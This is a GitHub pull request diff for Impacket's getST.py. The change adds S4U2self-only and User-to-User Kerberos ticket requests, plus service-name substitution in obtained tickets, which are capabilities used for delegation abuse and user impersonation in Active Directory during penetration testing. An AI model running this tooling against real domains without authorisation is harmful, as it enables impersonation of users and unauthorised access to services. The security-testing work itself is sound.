Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

implemented S4U2self only and u2u in getST.py #1691

Merged
merged 1 commit into from
Jan 30, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
185 changes: 132 additions & 53 deletions examples/getST.py
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
#!/usr/bin/env python
#!/usr/bin/env python3
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright (C) 2023 Fortra. All rights reserved.
# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
Expand Down Expand Up @@ -31,9 +31,15 @@
#
# Once you have the ccache file, set it in the KRB5CCNAME variable and use it for fun and profit.
#
# Author:
# Authors:
# Alberto Solino (@agsolino)
#
# Charlie Bromberg (@_nwodtuhs)
# Martin Gallo (@MartinGalloAr)
# Dirk-jan Mollema (@_dirkjan)
# Elad Shamir (@elad_shamir)
# @snovvcrash
# Leandro (@0xdeaddood)
# Jake Karnes (@jakekarnes42)

from __future__ import division
from __future__ import print_function
Expand All @@ -53,11 +59,11 @@
from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_credentials
from impacket.krb5 import constants
from impacket.krb5 import constants, types, crypto, ccache
from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \
Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart
from impacket.krb5.ccache import CCache
from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, _AES256CTS, Enctype
from impacket.krb5.ccache import CCache, Credential
from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, _AES256CTS, Enctype, string_to_key
from impacket.krb5.constants import TicketFlags, encodeFlags
from impacket.krb5.kerberosv5 import getKerberosTGS, getKerberosTGT, sendReceive
from impacket.krb5.types import Principal, KerberosTime, Ticket
Expand All @@ -78,14 +84,82 @@ def __init__(self, target, password, domain, options):
self.__force_forwardable = options.force_forwardable
self.__additional_ticket = options.additional_ticket
self.__saveFileName = None
self.__no_s4u2proxy = options.no_s4u2proxy
if options.hashes is not None:
self.__lmhash, self.__nthash = options.hashes.split(':')

def saveTicket(self, ticket, sessionKey):
logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
ccache = CCache()

ccache.fromTGS(ticket, sessionKey, sessionKey)
if self.__options.altservice is not None:
decodedST = decoder.decode(ticket, asn1Spec=TGS_REP())[0]
sname = decodedST['ticket']['sname']['name-string']
if len(decodedST['ticket']['sname']['name-string']) == 1:
logging.debug("Original sname is not formatted as usual (i.e. CLASS/HOSTNAME), automatically filling the substitution service will fail")
logging.debug("Original sname is: %s" % sname[0])
if '/' not in self.__options.altservice:
raise ValueError("Substitution service must include service class AND name (i.e. CLASS/HOSTNAME@REALM, or CLASS/HOSTNAME)")
service_class, service_hostname = ('', sname[0])
service_realm = decodedST['ticket']['realm']
elif len(decodedST['ticket']['sname']['name-string']) == 2:
service_class, service_hostname = decodedST['ticket']['sname']['name-string']
service_realm = decodedST['ticket']['realm']
else:
logging.debug("Original sname is: %s" % '/'.join(sname))
raise ValueError("Original sname is not formatted as usual (i.e. CLASS/HOSTNAME), something's wrong here...")
if '@' in self.__options.altservice:
new_service_realm = self.__options.altservice.split('@')[1].upper()
if not '.' in new_service_realm:
logging.debug("New service realm is not FQDN, you may encounter errors")
if '/' in self.__options.altservice:
new_service_hostname = self.__options.altservice.split('@')[0].split('/')[1]
new_service_class = self.__options.altservice.split('@')[0].split('/')[0]
else:
logging.debug("No service hostname in new SPN, using the current one (%s)" % service_hostname)
new_service_hostname = service_hostname
new_service_class = self.__options.altservice.split('@')[0]
else:
logging.debug("No service realm in new SPN, using the current one (%s)" % service_realm)
new_service_realm = service_realm
if '/' in self.__options.altservice:
new_service_hostname = self.__options.altservice.split('/')[1]
new_service_class = self.__options.altservice.split('/')[0]
else:
logging.debug("No service hostname in new SPN, using the current one (%s)" % service_hostname)
new_service_hostname = service_hostname
new_service_class = self.__options.altservice
if len(service_class) == 0:
current_service = "%s@%s" % (service_hostname, service_realm)
else:
current_service = "%s/%s@%s" % (service_class, service_hostname, service_realm)
new_service = "%s/%s@%s" % (new_service_class, new_service_hostname, new_service_realm)
self.__saveFileName += "@" + new_service.replace("/", "_")
logging.info('Changing service from %s to %s' % (current_service, new_service))
# the values are changed in the ticket
decodedST['ticket']['sname']['name-string'][0] = new_service_class
decodedST['ticket']['sname']['name-string'][1] = new_service_hostname
decodedST['ticket']['realm'] = new_service_realm
ticket = encoder.encode(decodedST)
ccache.fromTGS(ticket, sessionKey, sessionKey)
# the values need to be changed in the ccache credentials
# we already checked everything above, we can simply do the second replacement here
for creds in ccache.credentials:
creds['server'].fromPrincipal(Principal(new_service, type=constants.PrincipalNameType.NT_PRINCIPAL.value))
else:
ccache.fromTGS(ticket, sessionKey, sessionKey)
creds = ccache.credentials[0]
service_realm = creds['server'].realm['data']
service_class = ''
if len(creds['server'].components) == 2:
service_class = creds['server'].components[0]['data']
service_hostname = creds['server'].components[1]['data']
else:
service_hostname = creds['server'].components[0]['data']
if len(service_class) == 0:
service = "%s@%s" % (service_hostname, service_realm)
else:
service = "%s/%s@%s" % (service_class, service_hostname, service_realm)
self.__saveFileName += "@" + service.replace("/", "_")
logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
ccache.saveFile(self.__saveFileName + '.ccache')

def doS4U2ProxyWithAdditionalTicket(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, additional_ticket_path):
Expand Down Expand Up @@ -274,26 +348,9 @@ def doS4U2ProxyWithAdditionalTicket(self, tgt, cipher, oldSessionKey, sessionKey
)
message = encoder.encode(tgsReq)

logging.info('\tRequesting S4U2Proxy')
logging.info('Requesting S4U2Proxy')
r = sendReceive(message, self.__domain, kdcHost)

tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]

cipherText = tgs['enc-part']['cipher']

# Key Usage 8
# TGS-REP encrypted part (includes application session
# key), encrypted with the TGS session key (Section 5.4.2)
plainText = cipher.decrypt(sessionKey, 8, cipherText)

encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]

newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])

# Creating new cipher based on received keytype
cipher = _enctype_table[encTGSRepPart['key']['keytype']]

return r, cipher, sessionKey, newSessionKey
return r, None, sessionKey, None

def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost):
decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
Expand Down Expand Up @@ -398,9 +455,19 @@ def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost)
opts.append(constants.KDCOptions.renewable.value)
opts.append(constants.KDCOptions.canonicalize.value)


if self.__options.u2u:
opts.append(constants.KDCOptions.renewable_ok.value)
opts.append(constants.KDCOptions.enc_tkt_in_skey.value)

reqBody['kdc-options'] = constants.encodeFlags(opts)

serverName = Principal(self.__user, type=constants.PrincipalNameType.NT_UNKNOWN.value)
if self.__no_s4u2proxy and self.__options.spn is not None:
logging.info("When doing S4U2self only, argument -spn is ignored")
if self.__options.u2u:
serverName = Principal(self.__user, self.__domain, type=constants.PrincipalNameType.NT_UNKNOWN.value)
else:
serverName = Principal(self.__user, type=constants.PrincipalNameType.NT_UNKNOWN.value)

seq_set(reqBody, 'sname', serverName.components_to_asn1)
reqBody['realm'] = str(decodedTGT['crealm'])
Expand All @@ -412,17 +479,23 @@ def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost)
seq_set_iter(reqBody, 'etype',
(int(cipher.enctype), int(constants.EncryptionTypes.rc4_hmac.value)))

if self.__options.u2u:
seq_set_iter(reqBody, 'additional-tickets', (ticket.to_asn1(TicketAsn1()),))

if logging.getLogger().level == logging.DEBUG:
logging.debug('Final TGS')
print(tgsReq.prettyPrint())

logging.info('\tRequesting S4U2self')
logging.info('Requesting S4U2self%s' % ('+U2U' if self.__options.u2u else ''))
message = encoder.encode(tgsReq)

r = sendReceive(message, self.__domain, kdcHost)

tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]

if self.__no_s4u2proxy:
return r, None, sessionKey, None

if logging.getLogger().level == logging.DEBUG:
logging.debug('TGS_REP')
print(tgs.prettyPrint())
Expand Down Expand Up @@ -595,26 +668,9 @@ def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost)
)
message = encoder.encode(tgsReq)

logging.info('\tRequesting S4U2Proxy')
logging.info('Requesting S4U2Proxy')
r = sendReceive(message, self.__domain, kdcHost)

tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]

cipherText = tgs['enc-part']['cipher']

# Key Usage 8
# TGS-REP encrypted part (includes application session
# key), encrypted with the TGS session key (Section 5.4.2)
plainText = cipher.decrypt(sessionKey, 8, cipherText)

encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]

newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])

# Creating new cipher based on received keytype
cipher = _enctype_table[encTGSRepPart['key']['keytype']]

return r, cipher, sessionKey, newSessionKey
return r, None, sessionKey, None

def run(self):
tgt = None
Expand All @@ -635,6 +691,7 @@ def run(self):
unhexlify(self.__lmhash), unhexlify(self.__nthash),
self.__aesKey,
self.__kdcHost)
logging.debug("TGT session key: %s" % hexlify(sessionKey.contents).decode())

# Ok, we have valid TGT, let's try to get a service ticket
if self.__options.impersonate is None:
Expand Down Expand Up @@ -673,15 +730,18 @@ def run(self):
parser = argparse.ArgumentParser(add_help=True, description="Given a password, hash or aesKey, it will request a "
"Service Ticket and save it as ccache")
parser.add_argument('identity', action='store', help='[domain/]username[:password]')
parser.add_argument('-spn', action="store", required=True, help='SPN (service/server) of the target service the '
'service ticket will' ' be generated for')
parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the '
'service ticket will' ' be generated for')
parser.add_argument('-altservice', action="store", help='New sname/SPN to set in the ticket')
parser.add_argument('-impersonate', action="store", help='target username that will be impersonated (thru S4U2Self)'
' for quering the ST. Keep in mind this will only work if '
'the identity provided in this scripts is allowed for '
'delegation to the SPN specified')
parser.add_argument('-additional-ticket', action='store', metavar='ticket.ccache', help='include a forwardable service ticket in a S4U2Proxy request for RBCD + KCD Kerberos only')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-u2u', dest='u2u', action='store_true', help='Request User-to-User ticket')
parser.add_argument('-self', dest='no_s4u2proxy', action='store_true', help='Only do S4U2self, no S4U2proxy')
parser.add_argument('-force-forwardable', action='store_true', help='Force the service ticket obtained through '
'S4U2Self to be forwardable. For best results, the -hashes and -aesKey values for the '
'specified -identity should be provided. This allows impresonation of protected users '
Expand All @@ -697,7 +757,7 @@ def run(self):
group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter')
'omitted it use the domain part (FQDN) specified in the target parameter')

if len(sys.argv) == 1:
parser.print_help()
Expand All @@ -708,6 +768,25 @@ def run(self):

options = parser.parse_args()

if not options.no_s4u2proxy and options.spn is None:
parser.error("argument -spn is required, except when -self is set")

if options.no_s4u2proxy and options.impersonate is None:
parser.error("argument -impersonate is required when doing S4U2self")

if options.no_s4u2proxy and options.altservice is not None:
if '/' not in options.altservice:
parser.error("When doing S4U2self only, substitution service must include service class AND name (i.e. CLASS/HOSTNAME@REALM, or CLASS/HOSTNAME)")

if options.additional_ticket is not None and options.impersonate is None:
parser.error("argument -impersonate is required when doing S4U2proxy")

if options.u2u is not None and (options.no_s4u2proxy is None and options.impersonate is None):
parser.error("-u2u is not implemented yet without being combined to S4U. Can't obtain a plain User-to-User ticket")
# implementing plain u2u would need to modify the getKerberosTGS() function and add a switch
# in case of u2u, the proper flags should be added in the request, as well as a proper S_PRINCIPAL structure with the domain being set in order to target a UPN
# the request would also need to embed an additional-ticket (the target user's TGT)

# Init the example's logger theme
logger.init(options.ts)

Expand Down